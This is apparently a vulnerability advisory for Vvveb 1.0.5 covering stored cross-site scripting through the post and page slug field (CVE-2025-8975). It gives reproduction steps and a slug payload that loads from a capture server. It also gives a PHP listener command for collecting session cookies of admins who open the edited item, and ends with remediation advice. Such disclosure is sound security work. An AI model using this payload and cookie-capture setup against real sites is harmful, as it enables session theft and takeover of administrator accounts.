DELTA OBSCURA

We are the team behind Mission Cyber Sentinel, a mission dedicated to securing 446,000 digital assets globally.

GitHub

Vvveb - v1.0.5 - Cross-Site Scripting via posts & pages

By 0xhamy 05:09 PM - October 22nd 2025
Type software
Product Environment web
Product Name Vvveb
Product Vendor givanz
Product Version 1.0.5
Product Link https://github.com/givanz/Vvveb
Vulnerability Name Cross-Site Scripting
Severity High
CVSS String CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CVSS Score 8.7
CVE ID CVE-2025-8975
Vendor Acknowledgement Yes
Affected digital Assets 268
Affected Users 26800
Date of Reporting Jan 03, 2025
PoC Exploit https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Credit 0xhamy

Description

Vvveb 1.0.5 is vulnerable to authenticated stored XSS during creation/editing of posts and pages.
The slug parameter for content at:

  • /vadmin123/index.php?module=content/post&type=post
  • /vadmin123/index.php?module=content/posts&type=page
    is stored and later rendered without proper sanitization. When the stored slug is reflected in edit views or the drag-and-drop designer, attacker-controlled HTML/JS executes in the Vvveb origin, enabling session theft and privileged actions against other authenticated users (admins/super admins).

Vulnerability Details

Editors can insert HTML into the slug (e.g., via post or page edit forms). The application persists this value and reuses it in multiple admin contexts (standard edit page, and the visual “drag and drop” designer).
Because the payload is stored and auto-rendered in privileged admin views, any moderator/admin who opens the affected item triggers execution—often without the payload being visible—allowing cookie/session exfiltration and authenticated API actions.

Steps to Reproduce

  1. Open post/page listings.

    http://127.0.0.1/vadmin123/index.php?module=content/posts&type=post
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=page

  2. Edit a specific item.

    http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=14&type=page

  3. Inject a payload into the slug and save.
    Example payload:

    "><img src="http://127.0.0.1:1718/capture.php">

  4. Trigger via normal edit view.
    Reload the edited item (or have another moderator/admin click it from the list—the UI opens directly in edit mode), e.g.:

    http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post

    The payload executes on load.

  5. Trigger via drag-and-drop designer.
    Opening the page in the visual editor also executes the stored payload:

    http://127.0.0.1/vadmin123/?module=editor/editor&name=Mauris+viverra+cursus+ante+laoreet+eleifend

    (The designer autoloads the stored slug into the UI, executing the payload even if it’s not visibly displayed.)

  6. (Optional) Verify exfiltration.
    Use the cookie-capture PHP from your gist (capture.php), start a listener:

    php -S 0.0.0.0:1718

    Observe inbound requests and captured session cookies when admins/moderators open affected items.

Recommendation

  • Sanitize/encode the slug field on input and output (treat as plain text; reject/escape HTML, quotes, and event handlers).
  • Centralize HTML sanitization for all admin-rendered fields using an allow-list sanitizer.
  • Harden CSP (disallow inline scripts; restrict img-src/connect-src to trusted domains).
  • Add preview/validation before saving slugs that influence admin UI rendering.